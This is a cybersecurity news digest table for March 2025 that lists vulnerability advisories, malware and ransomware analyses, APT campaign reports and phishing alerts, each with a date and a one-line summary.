2025 January(141) February(191) March(268) April(0) May(0) June(0) July(0) August(0) September(0)
DATE |
NAME |
CATEGORY |
SUBCATE |
INFO |
|
31.3.25 |
ICS |
CISA analyzed three files obtained from a critical infrastructure’s Ivanti Connect Secure device after threat actors exploited Ivanti CVE-2025-0282 for initial access. One file—that CISA is calling RESURGE—has functionality similar to SPAWNCHIMERA in how it creates a Secure Shell (SSH) tunnel for command and control (C2). |
||
|
31.3.25 |
VULNEREBILITY |
A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 allows a remote unauthenticated attacker to achieve remote code execution. |
||
|
29.3.25 |
ANDROID |
Exposing Crocodilus: New Device Takeover Malware Targeting Android Devices |
||
|
29.3.25 |
VULNEREBILITY |
CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0 are affected by a vulnerability that may result in unauthenticated access. Remote and unauthenticated HTTP requests to CrushFTP may allow attackers to gain unauthorized access. |
||
|
29.3.25 |
INCIDENT |
Multiple Cloudflare services, including R2 object storage, experienced an elevated rate of errors for 1 hour and 7 minutes on March 21, 2025 (starting at 21:38 UTC and ending 22:45 UTC). |
||
|
29.3.25 |
PHISHING |
A browser-in-the-browser (BitB) attack is a new phishing technique that simulates a login window with a spoofed domain within a parent browser window to steal credentials. |
||
|
29.3.25 |
VULNEREBILITY |
NTLM Hash Disclosure Spoofing Vulnerability |
||
|
29.3.25 |
VULNEREBILITY |
Windows Themes Spoofing Vulnerability |
||
|
29.3.25 |
RANSOMWARE |
Blacklock Ransomware: A Late Holiday Gift with Intrusion into the Threat Actor's Infrastructure |
||
|
28.3.25 |
RAT |
ANALYSIS OF A DISCORD-BASED REMOTE ACCESS TROJAN (RAT) |
||
|
28.3.25 |
RAT |
Analysis of Konni RAT: Stealth, Persistence, and Anti-Analysis Techniques |
||
|
28.3.25 |
MALWARE |
Juniper Routers, Network Devices Targeted with Custom Backdoors |
||
|
28.3.25 |
MALWARE |
Gamaredon campaign abuses LNK files to distribute Remcos backdoor |
||
|
28.3.25 |
Remcos backdoor distributed in the latest campaign attributed to Shuckworm APT |
A new campaign attributed to the Shuckworm APT (aka Gamaredon) has been reported by researchers from Cisco Talos. According to the released report, the attackers are targeting users from Ukraine with malicious .LNK files and PowerShell downloaders before infecting them with Remcos RAT payload. |
||
|
28.3.25 |
Argenta is a bank based in Belgium and also operates in the Netherlands and Luxembourg. Recently, Symantec has detected a new wave of phish runs spoofing Argenta's bank services with fake account notifications. |
|||
|
28.3.25 |
RALord is a new Rust-based ransomware variant identified in the wild. The malware encrypts user data and appends ".RALord" extension to the names of the locked files. |
|||
|
28.3.25 |
SnakeKeylogger | MALWARE | Keylogger | SnakeKeylogger – A Multistage Info Stealer Malware Campaign |
|
28.3.25 |
CoffeeLoader | MALWARE | Loader | CoffeeLoader: A Brew of Stealthy Techniques |
|
28.3.25 |
2025-03-26 -- SmartApeSG traffic for fake browser update leads to NetSupport RAT and StealC |
MALWARE TRAFFIC | MALWARE TRAFFIC | Zip files are password-protected. Of note, this site has a new password scheme. For the password, see the "about" page of this website. |
|
28.3.25 |
VIPKeyLogger Targets Japan’s Corporate Sector | ALERTS | VIRUS | VIPKeyLogger, a stealthy keylogging malware, has been observed in two phishing campaigns targeting Japanese organizations and international companies with local offices in Japan. |
|
28.3.25 |
PJobRAT Android malware | ALERTS | VIRUS | A new campaign distributing PJobRAT malware for Android has been discovered by the researchers from Sophos. The campaign targets mostly the mobile users from Taiwan and aims at collection and exfiltration of sensitive data including SMS messages, contact lists as well as documents and media file stored on the compromised devices. |
|
28.3.25 |
CVE-2025-24799 - SQL injection vulnerability in GLPI | VULNEREBILITY | CVE-2025-24799 is a recently identified SQL injection vulnerability affecting GLPI, which is a popular and open-source IT Service Management (ITSM) software. | |
|
28.3.25 |
PJobRAT | MALWARE | ANDROID RAT | PJobRAT makes a comeback, takes another crack at chat apps |
|
28.3.25 |
CVE-2025-2783 |
VULNEREBILITY |
Incorrect handle provided in unspecified circumstances in Mojo in Google Chrome on Windows prior to 134.0.6998.177 allowed a remote attacker to perform a sandbox escape via a malicious file. (Chromium security severity: High) | |
|
28.3.25 |
CVE-2025-2857 |
VULNEREBILITY |
Following the recent Chrome sandbox escape (CVE-2025-2783), various Firefox developers identified a similar pattern in our IPC code. A compromised child process could cause the parent process to return an unintentionally powerful handle, leading to a sandbox escape. | |
|
28.3.25 |
Morphing Meerkat | PHISHING | PHaaS | A Phishing Tale of DoH and DNS MX Abuse |
|
28.3.25 |
EDRKillShifter | MALWARE | Tool | Shifting the sands of RansomHub’s EDRKillShifter |
|
27.3.25 |
CVE-2025-29891 - Bypass/Injection vulnerability in Apache Camel | ALERTS | VULNEREBILITY | CVE-2025-29891 is a second recently identified bypass/injection vulnerability affecting Apache Camel, which is a popular open source integration framework. If successfully exploited, the flaw might enable the remote attackers to inject arbitrary parameters in the HTTP requests that are sent to the Camel application. |
|
27.3.25 |
New Go-based ReaderUpdate macOS malware variant | ALERTS | VIRUS | A new Go-based strain of the macOS malware dubbed ReaderUpdate has been discovered in the wild. Previous variants of this malware were based on Crystal, Nim and Rust programming languages. |
|
27.3.25 |
Phishing Surge Targets Rakuten Securities Users | ALERTS | PHISHING | In recent weeks, there has been an increase in phishing campaigns targeting users of Rakuten Securities (楽天証券), one of Japan’s largest and most well-established online brokerage firms. The company offers a wide range of investment services, including stocks, ETFs, mutual funds, futures, options, forex trading, and NISA (Japan’s tax-advantaged investment accounts). |
|
27.3.25 |
New Android malware leverages .NET MAUI framework for detection evasion | VIRUS | A new Android malware variant leveraging .NET MAUI framework has been identified in the wild. .NET MAUI is a cross-platform framework used to build native, desktop and mobile apps with C# and XAML. | |
|
27.3.25 |
PlayBoy Locker Ransomware | RANSOM | PlayBoy Locker is a ransomware variant discovered last September and initially distributed in form of a Ransomware-as-a-Service (RaaS) offering. The ransomware platform offered multi-OS support including Windows, NAS and ESXi operating systems. | |
|
27.3.25 |
APT36 TURNING AID INTO ATTACK | APT | BLOG | TURNING AID INTO ATTACK: EXPLOITATION OF PAKISTAN’S YOUTH LAPTOP SCHEME TO TARGET INDIA |
|
27.3.25 |
UI/UX changes | HACKING | INJECT | Over 150K websites hit by full-page hijack linking to Chinese gambling sites |
|
27.3.25 |
CVE-2020-8515 |
VULNEREBILITY |
(CVSS score: 9.8) — An operating system command injection vulnerability in multiple DrayTek router models that could allow remote code execution as root via shell metacharacters to the cgi-bin/mainfunction.cgi URI | |
|
27.3.25 |
CVE-2021-20123 |
VULNEREBILITY |
(CVSS score: 7.5) — A local file inclusion vulnerability in DrayTek VigorConnect that could allow an unauthenticated attacker to download arbitrary files from the underlying operating system with root privileges via the DownloadFileServlet endpoint | |
|
27.3.25 |
CVE-2021-20124 |
VULNEREBILITY |
(CVSS score: 7.5) — A local file inclusion vulnerability in DrayTek VigorConnect that could allow an unauthenticated attacker to download arbitrary files from the underlying operating system with root privileges via the WebServlet endpoint | |
|
27.3.25 |
CVE-2019-9874 |
VULNEREBILITY |
(CVSS score: 9.8) - A deserialization vulnerability in the Sitecore.Security.AntiCSRF module that allows an unauthenticated attacker to execute arbitrary code by sending a serialized .NET object in the HTTP POST parameter __CSRFTOKEN | |
|
27.3.25 |
CVE-2019-9875 |
VULNEREBILITY |
(CVSS score: 8.8) - A deserialization vulnerability in the Sitecore.Security.AntiCSRF module that allows an authenticated attacker to execute arbitrary code by sending a serialized .NET object in the HTTP POST parameter __CSRFTOKEN | |
|
27.3.25 |
CVE-2025-26512 |
VULNEREBILITY |
CVE-2025-26512 Privilege Escalation Vulnerability in SnapCenter | |
|
27.3.25 |
FamousSparrow | GROUP | APT | You will always remember this as the day you finally caught FamousSparrow |
|
26.3.25 |
ZDI-25-187 | ZERO-DAY | ZERO-DAY | (0Day) BEC Technologies Multiple Routers sys ping Command Injection Remote Code Execution Vulnerability |
|
26.3.25 |
ZDI-25-186 | ZERO-DAY | ZERO-DAY | (0Day) BEC Technologies Multiple Routers Cleartext Password Storage Information Disclosure Vulnerability |
|
26.3.25 |
ZDI-25-185 | ZERO-DAY | ZERO-DAY | (0Day) BEC Technologies Multiple Routers Insufficiently Protected Credentials Information Disclosure Vulnerability |
|
26.3.25 |
ZDI-25-184 | ZERO-DAY | ZERO-DAY | (0Day) BEC Technologies Multiple Routers Authentication Bypass Vulnerability |
|
26.3.25 |
ZDI-25-183 | ZERO-DAY | ZERO-DAY | (0Day) Bdrive NetDrive Uncontrolled Search Path Element Local Privilege Escalation Vulnerability |
|
26.3.25 |
ZDI-25-182 | ZERO-DAY | ZERO-DAY | (0Day) Bdrive NetDrive Uncontrolled Search Path Element Local Privilege Escalation Vulnerability |
|
26.3.25 |
ZDI-25-181 | ZERO-DAY | ZERO-DAY | (0Day) Arista NG Firewall User-Agent Cross-Site Scripting Remote Code Execution Vulnerability |
|
26.3.25 |
ZDI-25-180 | ZERO-DAY | ZERO-DAY | (0Day) 70mai A510 Use of Default Password Authentication Bypass Vulnerability |
|
26.3.25 |
ZDI-25-179 | ZERO-DAY | ZERO-DAY | (0Day) CarlinKit CPC200-CCPA Improper Verification of Cryptographic Signature Code Execution Vulnerability |
|
26.3.25 |
ZDI-25-178 | ZERO-DAY | ZERO-DAY | (0Day) CarlinKit CPC200-CCPA update.cgi Improper Verification of Cryptographic Signature Code Execution Vulnerability |
|
26.3.25 |
ZDI-25-177 | ZERO-DAY | ZERO-DAY | (0Day) CarlinKit CPC200-CCPA Wireless Hotspot Hard-Coded Credentials Authentication Bypass Vulnerability |
|
26.3.25 |
ZDI-25-176 | ZERO-DAY | ZERO-DAY | (0Day) CarlinKit CPC200-CCPA Missing Root of Trust Local Privilege Escalation Vulnerability |
|
26.3.25 |
CVE-2025-24813 - Critical path equivalence RCE vulnerability in Apache Tomcat | ALERTS | VULNEREBILITY | Security researchers have observed active exploitation attempts of CVE-2025-24813, a critical Remote Code Execution (RCE) vulnerability in Apache Tomcat, an open-source servlet container and web server for Java applications. The flaw, caused by a path equivalence issue, allows attackers to bypass security constraints and execute arbitrary code remotely. |
|
26.3.25 |
Dragon RaaS Group: Ransomware targeting the US and European countries | ALERTS | RANSOM | Dragon RaaS, a ransomware group that emerged in July 2024, primarily targets organizations in the US, Israel, UK, France and Germany. The group leverages web application vulnerabilities, brute-force attacks and stolen credentials as its main attack vectors using two ransomware variants: a Windows-focused encryptor, likely a modified version of StormCry and a PHP webshell which provides both backdoor functionality and persistent ransomware capabilities. |
|
26.3.25 |
New JS downloader observed in recent malspam campaign | ALERTS | VIRUS | Symantec has observed a new email campaign delivering a JavaScript downloader as an attachment. The JS arrives under various filenames in an email with variable subjects. |
|
26.3.25 |
Funnelweb attack group targets victims in Operation FishMedley | OPERATION | The China-backed advanced persistent threat group known as Funnelweb (aka Aquatic Panda, Earth Lusca, FishMonger) was responsible for an extensive campaign identified as Operation FishMedley. The campaign targeted entities including governments, NGOs, and think tanks across numerous countries. | |
|
26.3.25 |
CVE-2025–26319 - Flowise Pre-Auth arbitrary file upload vulnerability | VULNEREBILITY | CVE-2025–26319 is a recently disclosed pre-auth arbitrary file upload vulnerability affecting Flowise, which is a popular open source tool for developers to build customized LLM (Large Language Model) orchestration flows and AI agents. | |
|
26.3.25 |
FogDoor backdoor delivery campaign | ALERTS | VIRUS | A new campaign targeting Polish-speaking job-seeking developers has been reported to deliver a new backdoor variant dubbed FogDoor. The attackers lure the victims with a fake recruitment test that leads to a download of a .iso archive containing a malicious .lnk file. The executed .lnk file runs a PowerShell script responsible for installing the malware payload. |
|
26.3.25 |
CVE-2025-26633: How Water Gamayun Weaponizes MUIPath using MSC EvilTwin |
VULNEREBILITY |
Trend Research identified Russian threat actor Water Gamayun exploiting CVE-2025-26633, a zero-day vulnerability in the Microsoft Management Console that attackers exploit to execute malicious code and exfiltrate data. | |
|
26.3.25 |
CVE-2025-26633 |
VULNEREBILITY |
Improper neutralization in Microsoft Management Console allows an unauthorized attacker to bypass a security feature locally. | |
|
26.3.25 |
RedCurl | GROUP | APT | In mid to late 2024, Huntress uncovered activity across several organizations in Canada, with similar infrastructure and TTPs used that can be associated with the APT group known as RedCurl (aka Earth Kapre and Red Wolf). This activity goes back as far as November 2023 in the hosts observed by Huntress. |
|
26.3.25 |
CVE-2025-2783 |
VULNEREBILITY |
The Stable channel has been updated to 134.0.6998.177/.178 for Windows which will roll out over the coming days/weeks. A full list of changes in this build is available in the Log. | |
|
26.3.25 |
Inside Atlantis AIO | CRIME | CRIME | Inside Atlantis AIO: Credential Stuffing Across 140+ Platforms |
|
26.3.25 |
CVE-2025-22230 |
VULNEREBILITY |
VMware Tools for Windows contains an authentication bypass vulnerability due to improper access control. A malicious actor with non-administrative privileges on a guest VM may gain ability to perform certain high privilege operations within that VM. | |
|
25.3.25 |
CVE-2024-56346 & CVE-2024-56347 - recent IBM AIX OS vulnerabilities | ALERTS | VULNEREBILITY | CVE-2024-56346 and CVE-2024-56347 are two recently disclosed critical (CVSS score 10.0 and 9.6 respectively) vulnerabilities affecting IBM AIX operating system. |
|
25.3.25 |
SVCStealer malware | ALERTS | VIRUS | SVCStealer is a new C++based infostealing malware identified in the wild. The infostealer collects various sensitive information from the infected endpoints such as system information, credentials, cryptocurrency wallets, data stored in browsers, screenshots, data from messaging applications (Discord, Tox, Telegram) or VPN apps, and others. |
|
25.3.25 |
Raspberry Robin | MALWARE | Worm | Raspberry Robin: Copy Shop USB Worm Evolves to Initial Access Broker Enabling Other Threat Actor Attacks |
|
25.3.25 |
Elephant Beetle | GROUP | GROUP | Elephant Beetle: Uncovering an Organized Financial-Theft Operation |
|
25.3.25 |
Operational Relay Box (ORB) | OPERATION | OPERATION | An Introduction to Operational Relay Box (ORB) Networks - Unpatched, Forgotten, and Obscured |
|
25.3.25 |
Weaver Ant | GROUP | GROUP | Weaver Ant, the Web Shell Whisperer: Tracking a Live China-nexus Operation |
|
25.3.25 |
.NET MAUI | CAMPAIGN | Malware | New Android Malware Campaigns Evading Detection Using Cross-Platform Framework .NET MAUI |
|
25.3.25 |
CVE-2025-24513 |
VULNEREBILITY |
(CVSS score: 4.8) – An improper input validation vulnerability that could result in directory traversal within the container, leading to denial-of-service (DoS) or limited disclosure of secret objects from the cluster when combined with other vulnerabilities | |
|
25.3.25 |
CVE-2025-24514 |
VULNEREBILITY |
(CVSS score: 8.8) – The auth-url Ingress annotation can be used to inject configuration into NGINX, resulting in arbitrary code execution in the context of the ingress-nginx controller and disclosure of secrets accessible to the controller | |
|
25.3.25 |
CVE-2025-1097 |
VULNEREBILITY |
(CVSS score: 8.8) – The auth-tls-match-cn Ingress annotation can be used to inject configuration into NGINX, resulting in arbitrary code execution in the context of the ingress-nginx controller and disclosure of secrets accessible to the controller | |
|
25.3.25 |
CVE-2025-1098 |
VULNEREBILITY |
(CVSS score: 8.8) – The mirror-target and mirror-host Ingress annotations can be used to inject arbitrary configuration into NGINX, resulting in arbitrary code execution in the context of the ingress-nginx controller and disclosure of secrets accessible to the controller | |
|
25.3.25 |
CVE-2025-1974 |
VULNEREBILITY |
(CVSS score: 9.8) – An unauthenticated attacker with access to the pod network can achieve arbitrary code execution in the context of the ingress-nginx controller under certain conditions | |
|
24.3.25 |
VanHelsing RaaS Launch | RANSOMWARE | RaaS | VanHelsingRaaS is a new and rapidly growing ransomware-as-a-service (RaaS) affiliate program launched on March 7, 2025. The RaaS model allows a wide range of participants, from experienced hackers to newcomers, to get involved with a $5,000 deposit. |
|
24.3.25 |
CVE-2025-29927 |
VULNEREBILITY |
Next.js is a React framework for building full-stack web applications. Prior to 14.2.25 and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. | |
|
23.3.25 |
CVE-2024-48248 |
VULNEREBILITY |
NAKIVO Backup & Replication before 11.0.0.88174 allows absolute path traversal for reading files via getImageByPath to /c/router (this may lead to remote code execution across the enterprise because PhysicalDiscovery has cleartext credentials). | |
|
23.3.25 |
CVE-2024-20439 |
VULNEREBILITY |
Cisco Smart Licensing Utility Static Credential Vulnerability | |
|
23.3.25 |
CVE-2024-20440 |
VULNEREBILITY |
Cisco Smart Licensing Utility Information Disclosure Vulnerability | |
|
23.3.25 |
CVE-2025-30154 |
VULNEREBILITY |
reviewdog/action-setup is a GitHub action that installs reviewdog. reviewdog/action-setup@v1 was compromised March 11, 2025, between 18:42 and 20:31 UTC, with malicious code added that dumps exposed secrets to Github Actions Workflow Logs | |
|
23.3.25 |
CVE-2025-30066 |
VULNEREBILITY |
tj-actions changed-files before 46 allows remote attackers to discover secrets by reading actions logs. (The tags v1 through v45.0.7 were affected on 2025-03-14 and 2025-03-15 because they were modified by a threat actor to point at commit 0e58ed8, which contained malicious updateFeatures code.) | |
|
22.3.25 |
New variants of the Albabat ransomware implement multi-OS capabilities | ALERTS | RANSOM | A new strain of the Albabat ransomware has been reported to offer multi-OS support, according to latest report from Trend Micro. New Albabat variant is still under active development and it adds Linux and macOS to the list of the targeted platforms. |
|
22.3.25 |
New phishing campaign targets Pocket Card users | PHISHING | Symantec has detected a phishing campaign targeting Japanese users with fake Pocket Card notification emails. The emails use the subject line: | |
|
22.3.25 |
VanHelsing Ransomware | RANSOM | VanHelsing is a new ransomware variant recently identified in the wild. The malware encrypts user data and appends .vanhelsing or .vanlocker extension to the locked files. VanHelsing drops the ransom note in form of a text file called “README.txt” and it is also able to modify the desktop wallpaper. | |
|
22.3.25 |
Campaign impersonating travel bookings site using “ClickFix" technique | ALERTS | CAMPAIGN | A phishing campaign impersonating Booking.com to deliver credential stealing malware has been observed targeting hospitality organizations in Asia, North America, Oceania, and Europe. The attackers send fake emails impersonating the online travel agency. |
|
22.3.25 |
Recent UAT-5918 APT malicious activities targeting entities in Taiwan | APT | Researchers from Cisco Talos have reported a long-lasting campaign targeting entities in Taiwan and attributed to the UAT-5918 APT. The attackers are known to obtain access to the targeted environments usually via vulnerability exploitation. | |
|
22.3.25 |
DarkCrystal RAT distributed in malicious campaign UAC-0200 | VIRUS | According to a recent alert released by Ukraine's Computer Emergency Response Team (CERT-UA), a new wave of attacks against the defense sector in Ukraine has been detected. The campaign dubbed as UAC-0200 distributes malicious messages via the Signal messenger leading the victims to execution of DarkTortilla loader, which in turn decrypts and runs the DarkCrystal RAT (aka DCRat) payload. | |
|
22.3.25 |
Custom Betruger backdoor deployed by RansomHub affiliate | The Symantec Threat Hunter team has observed activity from a custom backdoor that can be tied to a RansomHub affiliate. RansomHub is a Ransomware-as-a-Service offering and the backdoor has been named Betruger. | ||
|
21.3.25 |
Bloody Wolf | MALWARE | Toolkit | The notorious cluster changes its toolkit by switching from malware to a legitimate remote administration tool |
|
21.3.25 |
ABYSSWORKER | MALWARE | Driver | Shedding light on the ABYSSWORKER driver |
|
21.3.25 |
Operation FishMedley | OPERATION | OPERATION | ESET researchers detail a global espionage operation by FishMonger, the APT group run by I‑SOON |
|
21.3.25 |
UAT-5918 | GROUP | GROUP | UAT-5918 targets critical infrastructure entities in Taiwan |
|
21.3.25 |
Trusted relationship attacks | ATTACK | ATTACK | Trusted relationship attacks: trust, but verify |
|
21.3.25 |
-=TWELVE= | GROUP | GROUP | -=TWELVE=- is back |
|
21.3.25 |
Head Mare | GROUP | GROUP | Head Mare: adventures of a unicorn in Russia and Belarus |
|
21.3.25 |
Arcane stealer | MALWARE | Stealer | What’s intriguing about this malware is how much it collects. It grabs account information from VPN and gaming clients, and all kinds of network utilities like ngrok, Playit, Cyberduck, FileZilla and DynDNS. The stealer was named Arcane, not to be confused with the well-known Arcane Stealer V. |
|
21.3.25 |
CVE-2024-20439 |
VULNEREBILITY |
(CVSS score: 9.8) - The presence of an undocumented static user credential for an administrative account that an attacker could exploit to log in to an affected system | |
|
21.3.25 |
CVE-2024-20440 |
VULNEREBILITY |
(CVSS score: 9.8) - A vulnerability arising due to an excessively verbose debug log file that an attacker could exploit to access such files by means of a crafted HTTP request and obtain credentials that can be used to access the API | |
|
21.3.25 |
CVE-2024-56347 |
VULNEREBILITY |
(CVSS score: 9.6) - An improper access control vulnerability that could permit a remote attacker to execute arbitrary commands via the AIX nimsh service SSL/TLS protection mechanism | |
|
21.3.25 |
CVE-2024-56346 |
VULNEREBILITY |
(CVSS score: 10.0) - An improper access control vulnerability that could permit a remote attacker to execute arbitrary commands via the AIX nimesis NIM master service | |
|
21.3.25 |
CVE-2025-23120 |
VULNEREBILITY |
A vulnerability allowing remote code execution (RCE) by authenticated domain users. | |
|
20.3.25 |
ZDI-25-175 | ZERO-DAY | ZERO-DAY | (0Day) Luxion KeyShot USDC File Parsing Use-After-Free Remote Code Execution Vulnerability |
|
20.3.25 |
ZDI-25-174 | ZERO-DAY | ZERO-DAY | (0Day) Luxion KeyShot DAE File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability |
|
20.3.25 |
ZDI-25-173 | ZERO-DAY | ZERO-DAY | (0Day) Luxion KeyShot DAE File Parsing Access of Uninitialized Pointer Remote Code Execution Vulnerability |
|
20.3.25 |
Paragon's Adroid Spyware | MALWARE | Android | Virtue or Vice? A First Look at Paragon’s Proliferating Spyware Operations |
|
20.3.25 |
CVE-2025-1316 |
VULNEREBILITY |
(CVSS score: 9.3) - Edimax IC-7100 IP camera contains an OS command injection vulnerability due to improper input sanitization that allows an attacker to achieve remote code execution via specially crafted requests (Unpatched due to the device reaching end-of-life) | |
|
20.3.25 |
CVE-2017-12637 |
VULNEREBILITY |
(CVSS score: 7.5) - SAP NetWeaver Application Server (AS) Java contains a directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS that allows a remote attacker to read arbitrary files via a .. (dot dot) in the query string | |
|
20.3.25 |
New Steganographic malware campaign exploits JPEG files to distribute Infostealers | ALERTS | VIRUS | A new steganographic malware campaign has been identified, using JPEG image files to distribute various infostealer malwares. The attack starts by luring users into downloading an obfuscated JPEG file, which contains hidden malicious scripts and executables. |
|
20.3.25 |
Fake captchas entice users to run malicious commands for rootkit deployment | VIRUS | Another fake captcha campaign is resulting in rootkits being deployed to unsuspecting victims. The attack is spread via fake captchas that impersonate popular software tools and websites, the captcha copies a malicious powershell command using curl to the users clipboard and provides instructions on how to run it to prove they are human. | |
|
20.3.25 |
CVE-2024-27564 - ChatGPT commit f9f4bbc SSRF vulnerability exploited in the wild | VULNEREBILITY | New reports emerged about threat actors actively exploiting an older Server-Side Request Forgery (SSRF) vulnerability (CVE-2024-27564) affecting OpenAI’s ChatGPT. | |
|
20.3.25 |
NailaoLocker Ransomware | RANSOM | NailaoLocker is a ransomware variant distributed last year in campaigns targeting various European healthcare organizations. The attackers responsible for the attacks have been leveraging previously disclosed Check Point Security Gateway vulnerability CVE-2024-24919 in the initial attack stages. | |
|
20.3.25 |
AnubisBackdoor: New Python-based malware linked to Coreid APT group | ALERTS | VIRUS | A relatively new backdoor malware dubbed AnubisBackdoor has been spotted in the wild. This Python-based backdoor is attributed to the Savage Ladybug group, which is reportedly connected to the notorious Coreid (aka Fin7) APT group. |
|
20.3.25 |
CVE-2025-27636 - Apache Camel Message Header Injection vulnerability | VULNEREBILITY | CVE-2025-27636 is a recently identified bypass/injection vulnerability affecting Apache Camel, which is a popular open source integration framework. | |
|
20.3.25 |
StilachiRAT malware | ALERTS | VIRUS | StilachiRAT is a new remote access trojan variant discovered recently by researchers from Microsoft. The malware possesses extensive remote control as well as infostealing capabilities. |
|
20.3.25 |
Black Basta Ransomware | RANSOMWARE | ANALYSIS | Analysis of Black Basta Ransomware Chat Leaks |
|
20.3.25 |
UAC-0200: Шпигунство за оборонно-промисловим комплексом за допомогою DarkCrystal RAT (CERT-UA#14045) | BATTLEFIELD UKRAINE | BATTLEFIELD UKRAINE | Урядовою командою реагування на компʼютерні надзвичайні події CERT-UA фіксуються непоодинокі випадки здійснення цільових кібератак як у відношенні співробітників підприємств оборонно-промислового комплексу, так й окремих представників Сил оборони України. |
|
20.3.25 |
CVE-2024-4577 |
VULNEREBILITY |
In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. | |
|
20.3.25 |
PEAKLIGHT | MALWARE | DROPPER | PEAKLIGHT: Decoding the Stealthy Memory-Only Malware |
|
20.3.25 |
Auto Dealership Supply Chain Attack | HACKING | MALWARE | Over 100 auto dealerships were being abused compliments of a supply chain attack of a shared video service unique to dealerships. |
|
20.3.25 |
ClearFake | MALWARE | JAVASCRIPT | ClearFake’s New Widespread Variant: Increased Web3 Exploitation for Malware Delivery |
|
20.3.25 |
ClearFake | CAMPAIGN | MALWARE | ClearFake’s New Widespread Variant: Increased Web3 Exploitation for Malware Delivery |
|
19.3.25 |
Protection Highlight: Thwarting Ransomware with Carbon Black Endpoint Standard | ALERTS | RANSOM | Today's ransomware is innovating at a rapid pace. Going beyond simple file encryption, ransomware increasingly leverages unknown variants and fileless techniques. |
|
19.3.25 |
JPHP downloader uncovered | VIRUS | A new downloader compiled with JPHP was recently observed. JPHP is an interpreter that allows PHP scripts to execute in a Java Virtual Machine. This particular malware was originally delivered in a ZIP file and leveraged Telegram for its C2 communications. Potential downloaded payloads include infostealers such as Danabot. | |
|
19.3.25 |
VenomRat malware campaign uses VHD files for data exfiltration | CAMPAIGN | A VenomRat malware campaign using VHD files has been observed in the wild. The attack begins with a phishing email containing an archive attachment disguised as a purchase order to lure users. Inside the archive there is a .vhd file which mounts itself as a hard disk when opened. | |
|
19.3.25 |
New XCSSET macOS malware variant discovered | According to recent reports, a new variant of XCSSET, the macOS modular malware, has been observed by researchers at Microsoft. First discovered in 2020, XCSSET is a sophisticated modular malware known to target users by infecting Apple Xcode projects. | ||
|
19.3.25 |
A new Sobolan malware campaign | ALERTS | CAMPAIGN | Threat Actors use compromised interactive computing environments like Jupyter Notebooks to spread Sobolan malware in a multi stage attack. |
|
19.3.25 |
Rules File Backdoor | ATTACK | AI | New Vulnerability in GitHub Copilot and Cursor: How Hackers Can Weaponize Code Agents |
|
19.3.25 |
CVE-2025-20061 |
VULNEREBILITY |
An operating system command injection vulnerability that could permit an attacker to execute arbitrary commands on the affected system via specially crafted POST requests containing an email parameter | |
|
19.3.25 |
CVE-2025-20014 |
VULNEREBILITY |
An operating system command injection vulnerability that could permit an attacker to execute arbitrary commands on the affected system via specially crafted POST requests containing a version parameter | |
|
19.3.25 |
CVE-2025-30066 |
VULNEREBILITY |
tj-actions changed-files before 46 allows remote attackers to discover secrets by reading actions logs. (The tags v1 through v45.0.7 were affected on 2025-03-14 and 2025-03-15 because they were modified by a threat actor to point at commit 0e58ed8, which contained malicious updateFeatures code.) | |
|
19.3.25 |
ZDI-CAN-25373 | Zero-Day | Zero-Day | (0Day) Microsoft Windows LNK File UI Misrepresentation Remote Code Execution Vulnerability |
|
19.3.25 |
CVE-2024-54085 |
VULNEREBILITY |
AMI’s SPx contains a vulnerability in the BMC where an Attacker may bypass authentication remotely through the Redfish Host Interface. A successful exploitation of this vulnerability may lead to a loss of confidentiality, integrity, and/or availability. | |
|
19.3.25 |
Operation AkaiRyū | OPERATION | OPERATION | Operation AkaiRyū: MirrorFace invites Europe to Expo 2025 and revives ANEL backdoor |
|
19.3.25 |
BADBOX 2.0 | BOTNET | BOTNET | Satori Threat Intelligence Disruption: BADBOX 2.0 Targets Consumer Devices with Multiple Fraud Schemes |
|
18.3.25 |
StilachiRAT | MALWARE | RAT | StilachiRAT analysis: From system reconnaissance to cryptocurrency theft |
|
18.3.25 |
CVE-2025-24813 |
VULNEREBILITY |
Path Equivalence: 'file.Name' (Internal Dot) leading to Remote Code Execution and/or Information disclosure and/or malicious content added to uploaded files via write enabled Default Servlet in Apache Tomcat. | |
|
17.3.25 |
CVE-2025-1316 |
VULNEREBILITY |
Edimax IC-7100 does not properly neutralize requests. An attacker can create specially crafted requests to achieve remote code execution on the device | |
|
17.3.25 |
CVE-2025-30066 |
VULNEREBILITY |
tj-actions changed-files before 46 allows remote attackers to discover secrets by reading actions logs. (The tags v1 through v45.0.7 were affected on 2025-03-14 and 2025-03-15 because they were modified by a threat actor to point at commit 0e58ed8, which contained malicious updateFeatures code.) | |
|
16.3.25 |
ENCRYPTED |
Decrypting Encrypted files from Akira Ransomware (Linux/ESXI variant 2024) using a bunch of GPUs |
||
|
16.3.25 |
VPN |
Inside BRUTED: Black Basta (RaaS) Members Used Automated Brute Forcing Framework to Target Edge Network Devices |
||
|
16.3.25 |
VULNEREBILITY |
A vulnerability in confederation implementation for the Border Gateway Protocol (BGP) in Cisco IOS XR Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition. |
||
|
16.3.25 |
TOOL |
THREAT ANALYSIS REPORT: Inside the LockBit Arsenal - The StealBit Exfiltration Tool |
||
|
16.3.25 |
RANSOMWARE |
New Ransomware Operator Exploits Fortinet Vulnerability Duo |
||
|
16.3.25 |
VULNEREBILITY |
An Improper Isolation or Compartmentalization vulnerability in the kernel of Juniper Networks Junos OS allows a local attacker with high privileges to compromise the integrity of the device. |
||
|
16.3.25 |
AI |
A new variant of the OctoV2 Android banking malware has been spread recently under the disguise of a DeepSeek AI mobile app. DeepSeek is a recently released AI-powered chatbot, much similar to the well known ChatGPT. |
||
|
14.3.25 |
SuperBlack is a new ransomware variant based on the leaked Lockbit builder. According to recent reports, a newly observed distribution of this malware has been attributed to the threat actor dubbed as Mora_001 (a possible Lockbit affiliate). |
|||
|
14.3.25 |
LithiumWare is a new ransomware strain observed in the wild. The malware encrypts user data and appends random four-character extensions to the locked files. |
|||
|
14.3.25 |
Vedalia threat group tied to new Android spyware called KoSpy |
